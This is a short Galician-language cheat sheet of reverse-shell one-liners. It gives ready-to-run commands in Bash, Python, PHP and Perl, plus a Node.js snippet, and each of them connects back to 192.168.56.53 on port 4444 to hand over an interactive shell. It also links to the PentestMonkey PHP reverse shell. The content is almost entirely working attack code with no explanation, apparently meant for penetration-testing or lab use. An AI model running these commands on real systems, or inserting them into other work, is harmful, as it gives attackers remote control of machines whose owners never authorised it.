Reverse Shells - Comandos Comúns
URL De interese
Bash Reverse Shell
# Versión 1 (máis común)
bash -i >& /dev/tcp/192.168.56.53/4444 0>&1
# Versión 2
bash -c 'bash -i >& /dev/tcp/192.168.56.53/4444 0>&1'
# Versión 3 (con exec)
exec bash -i >& /dev/tcp/192.168.56.53/4444 0>&1
Python Reverse Shell
# Python 2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.53",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.53",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
# Python reverse shell con script
export RHOST="192.168.56.53"
export RPORT=4444
python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
PHP Reverse Shell
# PHP one-liner
php -r '$sock=fsockopen("192.168.56.53",4444);exec("sh <&3 >&3 2>&3");'
# PHP con system
php -r '$sock=fsockopen("192.168.56.53",4444);system("sh <&3 >&3 2>&3");'
# PHP reverse shell (PentestMonkey)
# Descarga: https://github.com/pentestmonkey/php-reverse-shell
# Modificar $ip e $port
Perl Reverse Shell
perl -e 'use Socket;$i="192.168.56.53";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Node.js Reverse Shell
// Node.js reverse shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("sh", []);
var client = new net.Socket();
client.connect(4444, "192.168.56.53", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();